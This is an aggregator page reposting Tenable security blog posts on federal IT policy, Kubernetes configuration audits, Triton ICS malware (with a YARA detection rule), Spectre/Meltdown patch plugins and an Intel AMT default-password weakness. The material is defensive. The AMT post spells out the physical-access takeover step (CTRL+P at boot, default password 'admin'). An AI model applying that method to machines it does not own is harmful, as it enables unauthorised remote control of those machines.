seems there is a need for a “top down” approach where organizations provide
comprehensive cybersecurity, but also team up with customers and employees to
educate them about what they can do extend their best practices across their own
personal attack surface. This starts with companies being more transparent about
their own security practices and holding themselves accountable for lapses. If
they don’t make security a top business priority and they aren’t sensitive to
these changing consumer patterns and needs, they risk losing customers. Today,
being customer-focused isn’t just about making good products; it’s about
listening to customers and making sure the products and services they are using
don’t cause them harm.
The irony is that cyber poses an existential threat to our economy and our very
social fabric – safeguarding ourselves is therefore a shared responsibility.
Enterprises must lead the way by practicing fundamental hygiene and enforcing a
basic standard of care for their customers’ data. But individuals must do their
part, too – both as consumers and, in many cases, as employees of those same
enterprises – and that starts with cyber literacy.
Survey methodology:
This survey was conducted online within the United States by Harris Poll on
behalf of Tenable from November 28-30, 2017 among 2,196 U.S. adults ages 18 and
older. This online survey is not based on a probability sample and therefore no
estimate of theoretical sampling error can be calculated. For complete survey
methodology, including weighting variables and subgroup sample sizes, please
contact Sarah Spitz of Bateman Group at 347-382-9731.
Image may be NSFW.
Clik here to view.
CONGRESS ACHIEVES REAL IT MODERNIZATION PROGRESS
December 19, 2017, 5:00 am
Next Auditing Kubernetes for Secure Configurations
Previous New Study: Many Consumers Lack Understanding of Basic Cyber Hygiene
0
0
Image may be NSFW.
Clik here to view.
We’ve talked about the need for Congress to prioritize upgrading and modernizing
government IT systems for a while now, so we were glad to see the Senate
recently pass the 2017 National Defense Authorization Act (NDAA) with the
Modernizing Government Technology (MGT) Act intact. The MGT Act (HR 2227),
introduced by Rep. Will Hurd (R-TX), was signed into law last Tuesday.
Federal IT modernization is a critical component of strong government
cybersecurity, and the necessity for this bill is clearer than ever. Recently,
the House Oversight and Government Reform Subcommittee on Information
Technology, which Rep. Hurd chairs, gave several federal agencies failing grades
for their efforts around IT modernization in the latest Federal IT Acquisition
Reform Act (FITARA) scorecard. Encouragingly, chairman Hurd plans to include the
MGT Act’s requirements for agencies to establish working capital funds as a
category in a future scorecard.
Rep. Hurd’s goal for FITARA to evolve into a digital Cyber Exposure scorecard
would help agencies more clearly assess their risk, because, as he noted
recently, legacy technology poses both a financial and cybersecurity risk to our
nation. Chief among those threats is the inability to identify it as part of a
rapidly expanding amount of assets. Agencies need to be able to take a modern
approach to cybersecurity that includes live discovery of every asset, whether
it’s an old server or an iPad, and continuous visibility into where those assets
are secure or exposed. All organizations now face an elastic attack surface,
where the constantly evolving number of assets and their vulnerabilities has led
to a gap in the ability to understand their overall cyber risk.
The MGT Act will help close that gap by establishing a capital fund, so agencies
can purchase the modern tools necessary for a comprehensive view of their Cyber
Exposure. The cyber funding in the bill also ensures that security is part of
future modernization efforts. Further, the MGT Act could save billions in
taxpayer dollars given that more than $64 billion is currently spent just to
operate and maintain legacy IT systems annually.
The MGT Act is smart public policy, and it’s encouraging to see bipartisan
progress from the IT subcommittee on such a critical cybersecurity issue,
including chairman Hurd, ranking member Kelly (D-IL), and Reps. Connolly (D-VA)
and Gianforte (R-MT). Yet, there is more to be done. Rep. Hurd’s next stated
focus on developing a “cyber corps” will help ensure that the federal government
has access to the people and skills they need to adequately prevent and respond
to cyberthreats. We also need to explore how advanced technologies like quantum
computing and blockchain may be used to mitigate threats. We look forward to
supporting these and other efforts to modernize the federal government’s
approach to cybersecurity next year.
Image may be NSFW.
Clik here to view.
Search
RSSing.com
--------------------------------------------------------------------------------
AUDITING KUBERNETES FOR SECURE CONFIGURATIONS
December 28, 2017, 5:00 am
Next Triton: What You Need to Know
Previous Congress Achieves Real IT Modernization Progress
0
0
Image may be NSFW.
Clik here to view.
Over the last few years, container technology has gained traction in enterprise
environments. And, as a result, use of containerized applications has exploded
in the enterprise. Naturally, as its adoption increased, management platforms
such as Kubernetes were developed to manage containerized applications. They’ve
now become critical to any modern DevOps-focused infrastructure. Tenable
recently released an audit to help customers secure this key piece of
infrastructure in their environments.
WHAT’S KUBERNETES?
Kubernetes is an open-source orchestration platform for deploying, maintaining
and scaling containerized applications. Kubernetes was originally developed by
Google, and later donated to the Cloud Native Computing Foundation. By
leveraging Kubernetes, organizations can:
* Deploy applications in a predictable manner
* Scale workloads up and down
* Limit resource utilization
* Increase availability through self-healing capabilities
WHY USE KUBERNETES?
Organizations choose Kubernetes over other orchestration platforms for many
reasons:
* Kubernetes is open source, and part of the Cloud Native Computing Foundation,
which has an impressive list of member organizations
* Vendor lock-in is reduced, as deployments can leverage bare metal, virtual
machines and public or private cloud – or a combination thereof
* Kubernetes can be used for all size deployments – from single cluster to a
scaled-up, federated platform orchestrating multiple geographically diverse
clusters
* Vanilla Kubernetes can easily be extended with enterprise-grade options such
as Tectonic, Rancher and OpenShift
WHY AUDIT KUBERNETES CONFIGURATION?
Depending on the workloads run on Kubernetes, you may consider it a core piece
of network infrastructure. After all, it could be hosting the external
applications that generate revenue for your business, sensitive internal
applications, customer information and more.
Auditing security configurations of such platforms should therefore be an
important part of any organization’s security program. A secure configuration
audit provides a level of assurance that an information system is configured
based on industry standard best practice recommendations.
To protect an information system, you need to account for every flaw that may
exist, while an attacker may only need to find a single flaw to exploit. As an
example, a recommended configuration is to only allow https traffic to the API
server. If the traffic was not encrypted, it may be possible for an attacker to
obtain sensitive information such as secrets and keys, and potentially take over
control of the cluster. The good news is that Tenable customers now have the
ability to perform a configuration audit of your Kubernetes based on the Center
for Internet Security (CIS) benchmark.
CIS KUBERNETES BENCHMARK
The CIS recently released the CIS Kubernetes Benchmark, which provides detailed
guidance to securely configure core components of Kubernetes, including the
Master Node, Worker Node and Federated Deployments.
MASTER NODE(S)
Responsible for managing the workload within the cluster. Services include:
* etcd: A key-value data store for cluster configuration
* API server: A REST service that provides an interface into Kubernetes; state
is stored in etcd
* Scheduler: Intelligently determines which nodes workloads should be assigned
to
* Controller manager: A process that controllers like the DaemonSet and
Replication controller run in; controllers access the API to manage resources
WORKER NODES
Responsible for running workloads within the cluster. Services include:
* Kubelet: Responsible for monitoring the health of containers
* Kube-proxy: Acts as proxy and load balancer for the containers running on the
node
* Container runtime: The service which runs the containers, such as Docker
FEDERATED DEPLOYMENTS
Function similar to Master Nodes, except they manage clusters instead of worker
nodes. Services include:
* Federation API server
* Federation Controller Manager
Federation is not required in all deployments, so this section may not apply to
your organization.
HOW TO GET STARTED
To get started, log into Tenable.io and create a new Policy Compliance Auditing
scan. In your scan configuration, select the Compliance tab. Under UNIX, CIS
Kubernetes Benchmarks are now available. Due to Kubernetes’ deployment
flexibility, the audit utilizes variables to ensure the checks are specific to
your deployment.
Image may be NSFW.
Clik here to view.
Once the configuration is saved, run the scan and review the results. Below is
sample output from a scan. For simplicity, only results from the worker node are
displayed.
Image may be NSFW.
Clik here to view.
Below is a closer view of one of the results. This page shows:
* Pass/fail status
* Remediation steps, if necessary
* Individual results from the systems scanned
Image may be NSFW.
Clik here to view.
Also, note the reference to cybersecurity frameworks and standards on the right
(in the Reference Information section). In this example, the controls listed
are:
* ITSG-33: CM-6 – configuration settings
* CIS CSCv6 - 9.1 – ensure that only ports, protocols and services with
validated business needs are running on each system
* NIST 800-50: CM-6 – configuration settings
* NIST CSF: PR.IP-1 – a baseline configuration of information
technology/industrial control systems is created and maintained
* NIST 800-171: 3.4.2 – establish and enforce security configuration settings
for IT products employed in organizational information systems
Depending on the cybersecurity framework your organization follows, you can map
these compliance results to the controls to assist you in demonstrating
compliance.
WRAP-UP: PLANNING A KUBERNETES DEPLOYMENT
When planning a Kubernetes deployment, it’s important to:
* Create or adopt a secure configuration
* Determine how you’ll monitor the configuration
* Establish how frequently you’ll review the configuration
At Tenable, we regularly update our policy compliance audits to match the newest
versions by Center for Internet Security (CIS) and Defense Information Systems
Agency (DISA). In some cases, we produce our own best practice audits. We also
realize there are many cybersecurity frameworks available for organizations to
follow, so we regularly map the checks in the policy compliance audits to
various framework controls.
Learn more about Tenable.io.
Image may be NSFW.
Clik here to view.
TRITON: WHAT YOU NEED TO KNOW
January 2, 2018, 1:31 pm
Next The First Major Security Logos of 2018: Spectre and Meltdown
Vulnerabilities
Previous Auditing Kubernetes for Secure Configurations
0
0
Image may be NSFW.
Clik here to view.
Correction: An earlier version of this post identified the protocol used as the
TSAA protocol. This malware uses the TriStation protocol, which is proprietary
and undocumented. Thanks to Jimmy Wylie for the correction.
WHAT IS TRITON?
Triton is a new malware framework targeting safety systems monitoring SCADA
networks. It’s designed to run from within a compromised network, allowing the
attacker to observe and control Triconex Safety Instrumented System (SIS)
devices.
It has been reported that the attackers copied a malicious file (trilog.exe)
onto a management workstation, a Windows PC, and used that vantage point to
attempt to write new firmware to the memory of SIS devices.
Device firmware is designed to be updated remotely. A physical key on the front
of the device allows the user to switch between a PROGRAM mode, where
modifications are allowed, and others, such as read-only RUN. The attackers used
this capability as designed and relied on users to have left the device in
PROGRAM mode.
Although Triton did not leverage any vulnerabilities, Nessus can identify the
early stages of the attack.
WHICH DEVICES WERE ATTACKED BY TRITON?
Triton attacked Triconex Main Processors, model 3008. These safety monitoring
systems were approved for use by the United States Nuclear Regulatory Commission
in 2012.
WHAT’S THE IMPACT?
If successful, this attack could have run arbitrary code on critical safety
monitoring systems, concealing or causing physical damage to monitored systems.
DID THE ATTACKERS NEED TO REVERSE ENGINEER THE DEVICES?
The attackers didn’t necessarily reverse engineer the devices. The US Nuclear
Regulatory Commission maintains copies of the programming guides and
communications manuals in use at the time of their approval. Appendix D
documents the TSAA (TriStation) protocol, including the WRITE_TRICON_DATA
command this malware likely used.
The protocol is simple, and has no authentication. The only facet of security it
supplies is a per-message CRC.
TENABLE COVERAGE OF TRITON
MALWARE DETECTION PLUGIN
Tenable can detect if the management station contains Triton through its malware
detection plugin. Here’s an example of a Triton hash detected with the Malicious
Process Detection plugin ID 59275:
YARA DETECTION
Tenable customers can also use YARA rules to identify affected systems through
the Malicious File Detection Using Yara Nessus plugin. Here’s a sample rule that
can be used with Nessus to detect Triton:
rule TRITON_ICS_FRAMEWORK
{
meta:
author = "nicholas.carr @itsreallynick"
md5 = "0face841f7b2953e7c29c064d6886523"
description = "TRITON framework recovered during Mandiant ICS incident response"
strings:
$python_compiled = ".pyc" nocase ascii wide
$python_module_01 = "__module__" nocase ascii wide
$python_module_02 = "<module>" nocase ascii wide
$python_script_01 = "import Ts" nocase ascii wide
$python_script_02 = "def ts_" nocase ascii wide
$py_cnames_01 = "TS_cnames.py" nocase ascii wide
$py_cnames_02 = "TRICON" nocase ascii wide
$py_cnames_03 = "TriStation " nocase ascii wide
$py_cnames_04 = " chassis " nocase ascii wide
$py_tslibs_01 = "GetCpStatus" nocase ascii wide
$py_tslibs_02 = "ts_" ascii wide
$py_tslibs_03 = " sequence" nocase ascii wide
$py_tslibs_04 = /import Ts(Hi|Low|Base)[^:alpha:]/ nocase ascii wide
$py_tslibs_05 = /module\s?version/ nocase ascii wide
$py_tslibs_06 = "bad " nocase ascii wide
$py_tslibs_07 = "prog_cnt" nocase ascii wide
$py_tsbase_01 = "TsBase.py" nocase ascii wide
$py_tsbase_02 = ".TsBase(" nocase ascii wide
$py_tshi_01 = "TsHi.py" nocase ascii wide
$py_tshi_02 = "keystate" nocase ascii wide
$py_tshi_03 = "GetProjectInfo" nocase ascii wide
$py_tshi_04 = "GetProgramTable" nocase ascii wide
$py_tshi_05 = "SafeAppendProgramMod" nocase ascii wide
$py_tshi_06 = ".TsHi(" ascii nocase wide
$py_tslow_01 = "TsLow.py" nocase ascii wide
$py_tslow_02 = "print_last_error" ascii nocase wide
$py_tslow_03 = ".TsLow(" ascii nocase wide
$py_tslow_04 = "tcm_" ascii wide
$py_tslow_05 = " TCM found" nocase ascii wide
$py_crc_01 = "crc.pyc" nocase ascii wide
$py_crc_02 = "CRC16_MODBUS" ascii wide
$py_crc_03 = "Kotov Alaxander" nocase ascii wide
$py_crc_04 = "CRC_CCITT_XMODEM" ascii wide
$py_crc_05 = "crc16ret" ascii wide
$py_crc_06 = "CRC16_CCITT_x1D0F" ascii wide
$py_crc_07 = /CRC16_CCITT[^_]/ ascii wide
$py_sh_01 = "sh.pyc" nocase ascii wide
$py_keyword_01 = " FAILURE" ascii wide
$py_keyword_02 = "symbol table" nocase ascii wide
$py_TRIDENT_01 = "inject.bin" ascii nocase wide
$py_TRIDENT_02 = "imain.bin" ascii nocase wide
condition:
2 of ($python_*) and 7 of ($py_*) and filesize < 3MB
}
WHAT CAN YOU DO TO PROTECT YOUR ORGANIZATION FROM TRITON?
Ensure all Tricon processors are not in PROGRAM mode. A physical key on each
device can prevent this malware from succeeding. After initial programming of
the device is complete, the key should be switched to RUN or REMOTE.
You should monitor management stations for malware. These are highly valuable
pivot points to the Distributed Control System network.
Tricon devices can be configured with an IP or subnet whitelist. You should
configure this access control to only allow communication from management
stations and the DCS and SIS networks. This will limit the use of active
security controls within these networks, which is why a monitoring solution such
as Nessus Network Monitor is essential.
STAY TUNED FOR MORE UPDATES
Tenable is keeping a close eye on this story as it develops. Our team will
release coverage as information becomes available, and this post will be updated
if new plugins are released.
Image may be NSFW.
Clik here to view.
THE FIRST MAJOR SECURITY LOGOS OF 2018: SPECTRE AND MELTDOWN VULNERABILITIES
January 4, 2018, 11:54 am
Next Tracking Scan Authentication Failures
Previous Triton: What You Need to Know
0
0
Image may be NSFW.
Clik here to view.
A major flaw in the way modern CPUs access cache memory could allow one program
to access data from another program. The latest security vulnerability affects a
majority of systems, if not all, used today. The vulnerabilities are named
Spectre and Meltdown and also have a dedicated website.
According to the security advisory, Spectre breaks the isolation between
different applications and allows an attacker to expose data once thought to be
secure. Meltdown breaks the most fundamental isolation between user applications
and the operating system. Both attacks are independent of the operating system
and do not rely on any software vulnerabilities. To reduce the risk of
compromise, users must apply software patches as quickly as possible.
SIDE CHANNEL ATTACKS
The new bugs are considered side channel attacks since they use side channels to
obtain the information from the accessed memory location. Spectre allows an
application to force another application to access arbitrary portions of its
memory, which can then be read through a side channel. This unique side channel
attack is done by speculative execution, a technique used by high-speed
processors in order to increase performance by guessing likely future execution
paths and preemptively executing the instructions in them. Spectre takes
advantage of this execution and affects all modern processors capable of keeping
instructions in flight.
Furthermore, memory isolation is a cornerstone of security and the environment
that allows multiple processes to be run on a device. The Meltdown bug allows
any application to access all system memory including memory allocated to the
kernel and overcomes the memory isolation. The unique side channel attack is one
side effect caused by out-of-order execution that is used as a performance
enhancement for processors. Meltdown specifically affects every Intel processor
on all desktop, laptop and cloud computers except Intel Itanium and Intel Atom
before 2013.
IDENTIFYING AFFECTED SYSTEMS
Operating system vendors are forgoing regular patch release cycles and
publishing operating system patches to address this issue. Tenable.io,
SecurityCenter and Nessus can identify affected systems by looking for the newly
released patches. Each plugin created for the Spectre and Meltdown
vulnerabilities will be marked with at least one of the following CVEs :
* CVE-2017-5753: Systems with microprocessors utilizing speculative execution
and branch prediction may allow unauthorized disclosure of information to an
attacker with local user access via a side-channel analysis.
* CVE-2017-5715: Systems with microprocessors utilizing speculative execution
and indirect branch prediction may allow unauthorized disclosure of
information to an attacker with local user access via a side-channel
analysis.
* CVE-2017-5754: Systems with microprocessors utilizing speculative execution
and indirect branch prediction may allow unauthorized disclosure of
information to an attacker with local user access via a side-channel analysis
of the data cache.
To identify which systems are affected using Tenable.io, open the workbench and,
using the advanced search, apply a CVE filter
(CVE-2017-5753,CVE-2017-5715,CVE-2017-5754) as shown below. In the example
filter, each CVE is placed in the field separated using a comma.
Image may be NSFW.
Clik here to view.
PLUGINS
When searching for the plugins using CVE you will find several plugins. This
list will be updated as more plugins are released.
Vendor
Plugin ID
Description
Amazon
105517
Amazon Linux AMI : kernel (ALAS-2018-939)
Microsoft
105547
KB4056888: Windows 10 Version 1511 January 2018 Security Update
(Meltdown)(Spectre)
Microsoft
105548
KB4056890: Windows 10 Version 1607 and Windows Server 2016 January 2018 Security
Update (Meltdown)(Spectre)
Microsoft
105549
KB4056891: Windows 10 Version 1703 January 2018 Security Update
(Meltdown)(Spectre)
Microsoft
105550
KB4056892: Windows 10 Version 1709 January 2018 Security Update
(Meltdown)(Spectre)
Microsoft
105551
KB4056893: Windows 10 LTSB January 2018 Security Update (Meltdown)(Spectre)
Microsoft
105552
KB4056897: Windows 7 and Windows Server 2008 R2 January 2018 Security Update
(Meltdown)(Spectre)
Microsoft
105553
KB4056898: Windows 8.1 and Windows Server 2012 R2 January 2018 Security Update
(Meltdown)(Spectre)
Red Hat
105523
RHEL 7 : kernel (RHSA-2018:0007)
Red Hat
105524
RHEL 6 : kernel (RHSA-2018:0008)
Red Hat
105525
RHEL 7 : kernel (RHSA-2018:0009)
Red Hat
105526
RHEL 7 : kernel (RHSA-2018:0010)
Red Hat
105527
RHEL 6 : kernel (RHSA-2018:0011)
Red Hat
105528
RHEL 7 : microcode_ctl (RHSA-2018:0012)
Red Hat
105529
RHEL 6 : microcode_ctl (RHSA-2018:0013)
Red Hat
105530
RHEL 7 : linux-firmware (RHSA-2018:0014)
Red Hat
105531
RHEL 7 : linux-firmware (RHSA-2018:0015)
Red Hat
105532
RHEL 7 : kernel-rt (RHSA-2018:0016)
Red Hat
105533
RHEL 6 : kernel (RHSA-2018:0017)
Scientific Linux
105534
Scientific Linux Security Update : kernel on SL6.x i386/x86_64
Scientific Linux
105535
Scientific Linux Security Update : kernel on SL7.x x86_64
Scientific Linux
105536
Scientific Linux Security Update : microcode_ctl on SL6.x i386/x86_64
Scientific Linux
105537
Scientific Linux Security Update : microcode_ctl on SL7.x x86_64
SUSE
105539
SUSE SLED12 / SLES12 Security Update : ucode-intel (SUSE-SU-2018:0006-1)
SUSE
105540
SUSE SLED12 / SLES12 Security Update : qemu (SUSE-SU-2018:0007-1)
SUSE
105541
SUSE SLES11 Security Update : microcode_ctl (SUSE-SU-2018:0009-1)
VMware
105485
VMware Fusion 8.x < 8.5.9 Multiple Vulnerabilities (VMSA-2017-0021)
(VMSA-2018-0002) (Spectre) (macOS)
VMware
105555
VMware Player 12.x < 12.5.8 Multiple Vulnerabilities (VMSA-2017-0021)
(VMSA-2018-0002) (Spectre)
VMware
105487
VMware Workstation 12.x < 12.5.8 Multiple Vulnerabilities (VMSA-2017-0021)
(VMSA-2018-0002) (Spectre)
VMware
105486
ESXi 5.5 / 6.0 / 6.5 / Multiple Vulnerabilities (VMSA-2017-0021)
(VMSA-2018-0002) (Spectre) (remote check)
WRAPPING UP
We will continue to research these vulnerabilities, and investigate different
ways to detect them. When new information is available, we will release
additional plugins. This vulnerability is a real and present danger to all
organizations and should be patched immediately. While Microsoft, Red Hat,
VMWare and other vendors are making efforts to release patches, organizations
are responsible for applying those patches as soon as possible.
Image may be NSFW.
Clik here to view.
TRACKING SCAN AUTHENTICATION FAILURES
January 11, 2018, 5:00 am
Next Intel AMT Back in the News
Previous The First Major Security Logos of 2018: Spectre and Meltdown
Vulnerabilities
0
0
Image may be NSFW.
Clik here to view.
IT systems change all the time. New applications are added, configurations are
changed, permissions get revised – the list goes on and on. In some cases, the
changes end up restricting access to the system. For example, user accounts are
removed, access is revoked, account credentials change or expire, leading to
unexpected authentication failures and lockouts. And when the credentials fail,
applications that depend on them fail, too.
When the application that ends up failing is a vulnerability scanner (such as
Nessus), it could significantly impact an organization. Most organizations run
vulnerability scans on a weekly or a monthly schedule, so a missed scan (due to
authentication failure) could result in missed vulnerabilities, leaving systems
within an organization exposed to those vulnerabilities for weeks, if not
months, before the failures are identified and rectified.
To help our customers identify such failures earlier and resolve issues sooner,
we recently released a new plugin, which consolidates authentication failures
across various protocols and reports them in a single plugin.
The plugin runs toward the end of a scan and collects results from the entire
scan to provide a consolidated report. The plugin needs to be enabled in the
scan policy for it to provide a report. Also, note the plugin will not report
authentication failures for any host that Nessus is able to successfully
authenticate to for a given protocol.
The plugin currently reports authentication failures for the following
protocols/technologies:
SSH
The plugin reports detailed information on authentication failures on a
per-credential basis. As an example, if the scan policy had three credentials
defined, and each one of them failed for one reason or another, it will provide
a report on each user credential that failed and the reason it failed.
Here’s an SSH example:
Image may be NSFW.
Clik here to view.
SMB
The plugin reports authentication failures on a per-credential basis for SMB as
well.
Here’s an example:
Image may be NSFW.
Clik here to view.
DATABASE AUTHENTICATION
If database credentials are provided as part of the scan, and the credentials
fail for one or more database technologies (e.g., MySQL, Oracle), this plugin
will report those failures as well.
Here’s an example of database credential failure output:
Image may be NSFW.
Clik here to view.
IBM ISERIES
If IBM iSeries credentials are provided as part of the scan and Nessus fails to
authenticate, the plugin will report authentication failure along with a reason
why it failed.
Here’s an example:
Image may be NSFW.
Clik here to view.
WRAP-UP
For Nessus to perform an accurate and complete vulnerability scan, it needs
credentials with appropriate privileges to do its job. We realize providing the
right set of credentials and privileges to perform the scan is a challenging
problem. And recently, we’ve released additional functionality to help solve
some of those problems.
But a failed scan due to incorrect credentials shouldn’t be left unattended for
a long time since it could have a huge unintended impact. The last thing you
want is to be lulled into a false sense of safety while your environment changes
around you.
Therefore, tracking such failures sooner should be a top priority for any
organization. With the release of this new plugin, we hope our customers can do
just that.
Image may be NSFW.
Clik here to view.
INTEL AMT BACK IN THE NEWS
January 12, 2018, 4:58 pm
Next CDM: Making US Federal Agencies More AWARE of Cyber Exposure
Previous Tracking Scan Authentication Failures
0
0
Image may be NSFW.
Clik here to view.
The release of new research from F-Secure spells more trouble for Intel’s Active
Management Technology (AMT). AMT is used for remote access monitoring and
maintenance in corporate environments. Previously, in 2017, researchers
discovered a critical vulnerability with AMT that made headlines. The previous
vulnerability was a wide-reaching privilege escalation vulnerability
(INTEL-SA-00075, CVE-2017-5689). Now, AMT is in the news again this week, as
another serious security issue has been disclosed. The issue was discovered by a
security researcher with the Finnish security company F-Secure. It could allow
an attacker who has physical access to an affected device to enable the
technology’s remote access features, letting them take complete control of a
machine while on the same network segment.
DETAILS
The F-Secure advisory explains that an attacker who has physical access to the
device can simply reboot the machine and press CTRL+P during bootup to access
the Intel Management Engine BIOS Extension (MEBx) login. If Intel AMT hasn’t
already been provisioned by the device owner or corporate IT, the MEBx login is
only protected by a default password of admin. By accessing the MEBx
configuration, an attacker could enable remote access and set AMT’s user opt-in
to “None,” allowing the attacker to gain remote access to the device without the
user’s consent. This gives the attacker the ability to take full control of the
machine if they’re on the same wired or wireless network.
While the likelihood of an attack is decreased due to the requirement of
physical access to the device, the exploitation of this issue is both extremely
simple and takes very little time to execute for a reasonably skilled attacker.
Security professionals often warn users not to leave a laptop in a hotel room or
other unsecured location where the device is unattended. If the computer is left
unattended, the attacker has an opportunity to reboot the system, alter the MEBx
configuration and be gone – all before the user returns. A simple flaw such as
this becomes a gold mine for an attacker determined to target an individual or
organization.
DETECTION METHODS
New plugins have been released for Tenable.io Vulnerability Management,
SecurityCenter and Nessus to determine whether a device has Intel AMT remote
access enabled and running. Plugin #105778, Intel Management Engine Active
Management Technology [AMT] Remote Access Enabled, detects whether the Intel AMT
remote access feature is enabled based on the banner of the service listening on
port 16992. Using a previously released plugin, #102992, Intel Active Management
Technology (AMT) detection, you can identify systems potentially at risk for
this new vulnerability without scanning again.
Image may be NSFW.
Clik here to view.
SCAN POLICY MODIFICATIONS
The default port scanning preferences need to be modified to enable detection of
this vulnerability. The port scanning preferences need to be set to probe ports
16992, 16993 and 623 as well as the default ports. Also, you should scan the
system using the SYN and TCP network scanners in addition to the local scanner
option, as the local enumerator is unable to enumerate the Intel AMT ports.
Image may be NSFW.
Clik here to view.
To check whether your system supports Intel AMT, you can use the plugins
mentioned above. Alternatively, you may check your BIOS manually for Intel AMT
and MEBx technologies by pressing CTRL-P during the boot process. Intel has also
provided a reference document to help determine if you have an Intel AMT, Intel
SBA or Intel ISM capable system.
WRAPPING UP – WHAT YOU CAN DO RIGHT NOW
Here are a few suggestions on what you can do right now to protect your
organization from this newly discovered vulnerability:
* If your organization has devices that support Intel AMT technology and the
Intel Management Engine BIOS Extension, log into the MEBx menu and set a
strong password to replace the default password of admin. And if you don’t
plan to use Intel AMT, consider disabling it.
* Given the physical proximity required for this particular attack to be
executed, remind users to always be mindful of operational security: Don’t
leave laptops unattended in unsecured locations.
* Get plugin #105778, Intel Management Engine Active Management Technology
[AMT] Remote Access Enabled, which detects whether the Intel AMT remote
access feature is enabled based on the banner of the service listening on
port 16992.
* Learn more about Tenable.io, which we continuously update, so you can detect
the latest vulnerabilities quickly.
Image may be NSFW.
Clik here to view.
Viewing all 1364 articles
First Page ... Page 32 Page 33 Page 34 Page 35 Page 36 ... Last Page
Browse latest View live
--------------------------------------------------------------------------------
More Pages to Explore .....
* //vincidg42.rssing.com/chan-74108839/index-latest.php
* //misrepresentation254.rssing.com/chan-59341948/index-page1.html
* //welmer11.rssing.com/chan-12633547/article9.html
* //knees965.rssing.com/chan-44237576/index-latest.php
* //conference5886.rssing.com/chan-29928699/index-latest.php
* //hygiene1644.rssing.com/chan-12633046/index-latest.php
* //kelch21.rssing.com/chan-29928904/index-latest.php
* //arantes40.rssing.com/chan-29928427/article7.html
* //greenpages92.rssing.com/chan-29928833/index-page1.html
* //animalfeasance139.rssing.com/chan-44238070/index-latest.php
* //videogp21.rssing.com/chan-12632661/article10.html
* //gasol346.rssing.com/chan-44237885/index-page1.html
* //meade154.rssing.com/chan-12633037/article37.html
* //coffeefanatic1.rssing.com/chan-2071696/index-page1.html
* //cymbidium72.rssing.com/chan-2071878/article132.html
* //cmvreud1.rssing.com/chan-2071684/index-page1.html
* //plotormedext2.rssing.com/chan-59341716/index-latest.php
* //distillery567.rssing.com/chan-74109697/article5.html
* //surrounding868.rssing.com/chan-12632641/index-page1.html
* //gaming6229.rssing.com/chan-12632772/index-page1.html
av-override
00:04
/
01:08
Replay
Read More
--------------------------------------------------------------------------------
click here for Latest and Popular articles on Electronic Design Automation (EDA)
click here for Latest and Popular articles on Mesothelioma and Asbestos
--------------------------------------------------------------------------------
Search
RSSing.com
--------------------------------------------------------------------------------
TOP-RATED IMAGES
कार्यविभाजन टुंगो नलाग्दा स्वास्थ्य प्राविधिक सचिव डा. पोखरेल जिम्मेवारीविहीन
SEROLD BROOKS
RASCALS (2011) FULL MOVIE HINDI 350MB HDRIP 480P ESUBS
MARY BETH MCANDREWS’ FAVORITE UNDERSEEN FOUND FOOTAGE FILMS
PHILIPS MAGNAVOX - 20PT6245/37 - MAIN SMPS - DVD POWER - SCHEMATIC
SADIQ - AKPELLA (2016)
CBSE CLASS 10 ENGLISH GRAMMAR – EDITING TASK
PLEASE READ MY PALM:)
AMZ MINI BOOSTER SMD
PINTEREST
MARK CHAO 赵又廷 ~ GOES SOLO FOR L’OFFICIEL (CHINA) JULY...
ANGELIKA HEADLEE, 62, KIMBALL, MICHIGAN
A TRIBUTE: LI HONGYI, FUTURE PM NOT TO BE, REMEMBERING HIS LIFETIME ACHIEVEMENT
THERE IS, THERE ARE
WEAPONS CHARGES & ENDANGERING THE WELFARE OF A CHILD
TEXAS: AUSTIN TEXAS POLICE REPORT DWI ARREST BOOKINGS IN TRAVIS COUNTY JAIL FOR
NOV. 1, 2019
DEADLY DUO: STEPHANIE LYNN MARTIN AND WILLIAM M. BUSENBURG
TERRENCE MCNEILL
PETER DARRELL TRIMINGHAM
PANINI - ADRENALYN XL FIFA 365 2017 (05) - NORDIC EDITION - CHECKLIST
LATEST IMAGES
LAST VALID VALUE , CURRENT VALUE
January 25, 2022, 5:40 am
THE ELDEN RING DIGITAL ISSUE IS NOW LIVE
January 28, 2022, 2:01 pm
SCHUYLKILL COUNTY WEATHER FORECAST FOR FRIDAY, JANUARY 28TH, 2022
January 28, 2022, 10:53 am
CLOSE UP INTERVIEW
January 27, 2022, 8:21 pm
FORTNITE: SPIDER-MAN NEMESIS GREEN GOBLIN HAS GLIDED INTO THE BATTLE ROYALE
January 27, 2022, 4:09 pm
DUMP TRUCK CRASH SHUTS DOWN ROUTE 1A FOR MORE THAN 2 HOURS
January 27, 2022, 1:36 pm
THE 26 BEST FACE MASKS FOR RUNNING, CYCLING & WORKING OUT: UNDER ARMOUR,...
January 26, 2022, 1:00 pm
DEVELOPING METAVERSE: YOUR FIRST VR GAME IN UNREAL ENGINE
January 26, 2022, 12:55 pm
VP LENI ANGAT SA IBA. TALO SI MARCOS
January 25, 2022, 10:39 pm
ROLLING STONES - 1969-12-09 OLYMPIC SOUND STUDIOS, LONDON, UK, STUDIO SESSION
January 25, 2022, 1:48 pm
LAST VALID VALUE , CURRENT VALUE
January 25, 2022, 5:40 am
THE ELDEN RING DIGITAL ISSUE IS NOW LIVE
January 28, 2022, 2:01 pm
click here for Latest and Popular articles on SAP ERP
* RSSing>>
* Latest
* Popular
* Top Rated
* Trending
© 2022 //www.rssing.com